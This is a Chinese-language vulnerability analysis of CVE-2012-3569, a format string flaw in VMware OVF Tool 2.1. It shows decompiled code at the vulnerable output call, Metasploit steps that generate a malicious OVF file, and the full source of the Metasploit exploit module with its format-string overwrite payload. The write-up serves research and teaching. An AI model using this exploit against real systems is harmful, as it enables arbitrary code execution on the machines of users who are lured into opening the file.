CVE-2012-3569 漏洞研究

开放虚拟机格式（Open Virtual Machine Format，OVF）是一种虚拟机分配格式，能够支持不同产品与组织之间共享虚拟机。VMware OVF Tool 是由 VMware 免费提供的一款支持虚拟的导入导出工具，支持以命令提示符的方式运行。该工具在解析 OVF 文件时存在格式化字符串漏洞，攻击者可以通过诱使用户加载恶意构造的 OVF 文件实现任意代码执行。

影响范围:
vmware:ovf_tool:2.1
vmware:workstation:8.0-8.0.4
vmware:player:4.0-4.0.4

漏洞分析

格式化字符串漏洞会破坏栈空间布局，因此通过打开样本从 Crash Point 开始动态分析会让漏洞分析变得举步维艰。考虑到格式化字符串漏洞的原因主要出现在打印函数的参数上，可以以相关打印函数作为漏洞分析的切入点。

调试运行 ovftool.exe 并打开样本，查找常量表中的硬编码字符串，并查看其引用函数，递归查询其引用函数的交叉引用函数，并对所有的打印函数下断点。跟踪到 ovftool.exe 开始输出样本中的 ovf:capacityAllocationUnits 属性值时开始单步跟进，最终会在崩溃前定位到 std::basic_ostream 函数。查阅文档发现该函数定义为

template<
    class CharT,
    class Traits = std::char_traits<CharT>
> class basic_ostream : virtual public std::basic_ios<CharT, Traits>

该函数的主调函数在对其进行调用时所执行的代码片段反编译结果为

v36 = v30[5];
v20 = (int (__thiscall **)(_DWORD, _DWORD, _DWORD))(*(_DWORD *)v30[5] + 16);
v21 = (*(int (__thiscall **)(int, int))(*(_DWORD *)v4 + 44))(v4, v19);
v22 = (*v20)(v36, &v28, v21);
v31 = 1;
v23 = v22;
v24 = sub_401A90(&dword_160C7D8, " - ");
v25 = std::operator<<<char,std::char_traits<char>,std::allocator<char>>(v24, v23);
std::basic_ostream<char,std::char_traits<char>>::operator<<(v25, std::endl);   // Vulnerability Point
v31 = -1;
std::basic_string<char,std::char_traits<char>,std::allocator<char>>::~basic_string<char,std::char_traits<char>,std::allocator<char>>(&v28);
++v19;
result = (*(int (__thiscall **)(_DWORD))(*(_DWORD *)v4 + 36))(v4)

注意到 Vulnerability Point 处的代码在调用 std::basic_ostream 的 operator 成员函数以进行格式化输出时没有对来自于外界输入的格式化字符参数进行检查和过滤，因而存在格式化字符串漏洞

漏洞利用

使用 MSF 搜索该漏洞的 exp

msfconsole
msf6 > search cve-2012-3569

搜索结果

Matching Modules
================

   #  Name                                           Disclosure Date  Rank    Check  Description
   -  ----                                           ---------------  ----    -----  -----------
   0  exploit/windows/browser/ovftool_format_string  2012-11-08       normal  No     VMWare OVF Tools Format String Vulnerability
   1  exploit/windows/fileformat/ovf_format_string   2012-11-08       normal  No     VMWare OVF Tools Format String Vulnerability


Interact with a module by name or index. For example info 1, use 1 or use exploit/windows/fileformat/ovf_format_string

调用该模块并查看模块详情

msf6 > use exploit/windows/fileformat/ovf_format_string
msf6 exploit(windows/fileformat/ovf_format_string) > info

模块详情信息

msf6 exploit(windows/fileformat/ovf_format_string) > info

       Name: VMWare OVF Tools Format String Vulnerability
     Module: exploit/windows/fileformat/ovf_format_string
   Platform: Windows
       Arch: 
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Normal
  Disclosed: 2012-11-08

Provided by:
  Jeremy Brown
  juan vazquez <juan.vazquez@metasploit.com>

Available targets:
      Id  Name
      --  ----
  =>  0   VMWare OVF Tools 2.1 on Windows XP SP3

Check supported:
  No

Basic options:
  Name      Current Setting  Required  Description
  ----      ---------------  --------  -----------
  FILENAME  msf.ovf          yes       The file name.

Payload information:
  Avoid: 158 characters

Description:
  This module exploits a format string vulnerability in VMWare OVF Tools 2.1 for
  Windows. The vulnerability occurs when printing error messages while parsing a
  a malformed OVF file. The module has been tested successfully with VMWare OVF Tools
  2.1 on Windows XP SP3.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2012-3569
  OSVDB (87117)
  http://www.securityfocus.com/bid/56468
  https://www.vmware.com/security/advisories/VMSA-2012-0015.html


View the full module info with the info -d command.

使用该模块生成木马

msf6 exploit(windows/fileformat/ovf_format_string) > set payload windows/exec
msf6 exploit(windows/fileformat/ovf_format_string) > set CMD calc.exe
msf6 exploit(windows/fileformat/ovf_format_string) > exploit

随后 MSF 将生成 exp.ovf 文件，诱使目标打开即可实现漏洞利用

Exploit 分析

该模块的 exp 位于

/usr/share/metasploit-framework/modules/exploits/windows/fileformat/ovf_format_string.rb

exp 的核心代码为

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::FILEFORMAT

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'VMWare OVF Tools Format String Vulnerability',
      'Description'    => %q{...},
      'License'        => MSF_LICENSE,
      'Author'         => [...],
      'References'     => [...],
      'Payload'        =>
        {
          'DisableNops'    => true,
          'BadChars'       =>
            (0x00..0x08).to_a.pack("C*") +
            "\x0b\x0c\x0e\x0f" +
            (0x10..0x1f).to_a.pack("C*") +
            (0x80..0xff).to_a.pack("C*") +
            "\x22",
          'StackAdjustment' => -3500,
          'PrependEncoder' => "\x54\x59", # push esp # pop ecx
          'EncoderOptions' =>
            {
              'BufferRegister' => 'ECX',
              'BufferOffset' => 6
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # vmware-ovftool-2.1.0-467744-win-i386.msi
          [ 'VMWare OVF Tools 2.1 on Windows XP SP3',
            {
              'Ret' => 0x7852753d,  # call esp # MSVCR90.dll 9.00.30729.4148 installed with VMware OVF Tools 2.1
              'AddrPops' => 98,
              'StackPadding' => 38081,
              'Alignment' => 4096
            }
          ],
        ],
      'Privileged'     => false,
      'DisclosureDate' => '2012-11-08',
      'DefaultTarget'  => 0))

    register_options(
      [
        OptString.new('FILENAME', [ true, 'The file name.',  'msf.ovf']),
      ])
  end

  def ovf
    my_payload = rand_text_alpha(4) # ebp
    my_payload << [target.ret].pack("V") # eip # call esp
    my_payload << payload.encoded

    fs = rand_text_alpha(target['StackPadding']) # Padding until address aligned to 0x10000 (for example 0x120000)
    fs << rand_text_alpha(target['Alignment']) # Align to 0x11000
    fs << my_payload
    # 65536 => 0x10000
    # 27    => Error message prefix length
    fs << rand_text_alpha(65536 - 27 - target['StackPadding'] - target['Alignment'] - my_payload.length - (target['AddrPops'] * 8))
    fs << "%08x" * target['AddrPops'] # Reach saved EBP
    fs << "%hn" # Overwrite LSW of saved EBP with 0x1000

    ovf_file = <<-EOF
<?xml version="1.0" encoding="UTF-8"?>
<Envelope vmw:buildId="build-162856" xmlns="http://schemas.dmtf.org/ovf/envelope/1"
xmlns:cim="http://schemas.dmtf.org/wbem/wscim/1/common"
xmlns:ovf="http://schemas.dmtf.org/ovf/envelope/1"
xmlns:rasd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_ResourceAllocationSettingData"
xmlns:vmw="https://www.vmware.com/schema/ovf"
xmlns:vssd="http://schemas.dmtf.org/wbem/wscim/1/cim-schema/2/CIM_VirtualSystemSettingData"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
  <References>
    <File ovf:href="Small VM-disk1.vmdk" ovf:id="file1" ovf:size="68096" />
  </References>
  <DiskSection>
    <Info>Virtual disk information</Info>
    <Disk ovf:capacity="8" ovf:capacityAllocationUnits="#{fs}" ovf:diskId="vmdisk1" ovf:fileRef="file1" ovf:format="https://www.vmware.com/interfaces/specifications/vmdk.html#streamOptimized" />
  </DiskSection>
  <VirtualSystem ovf:id="Small VM">
    <Info>A virtual machine</Info>
  </VirtualSystem>
</Envelope>
    EOF
    ovf_file
  end

  def exploit
    print_status("Creating '#{datastore['FILENAME']}'. This files should be opened with VMMWare OVF 2.1")
    file_create(ovf)
  end
end

exp 较短，实际上按照 ovf 文件格式和 ovftool.exe 处理文件的逻辑生成包含了被填充字符包裹的格式化字符串 payload 的恶意文件。具体利用思路为劫持栈帧返回地址使程序执行流跳转到设定好的 shellcode 处，参照注释即可在此不再赘述

漏洞修复

使格式化控制字符串为字面量或者不由外界控制即可，漏洞修复思路较为明确而官方补丁变动较大不便分析，故不再赘述

Reference

std::basic_ostream
Official Document
Microsoft Vulnerability Research Advisory MSVR13-002
Github - CVE-2012-3569
NVD - CVE-2012-3569
CVE - CVE-2012-3569
漏洞战争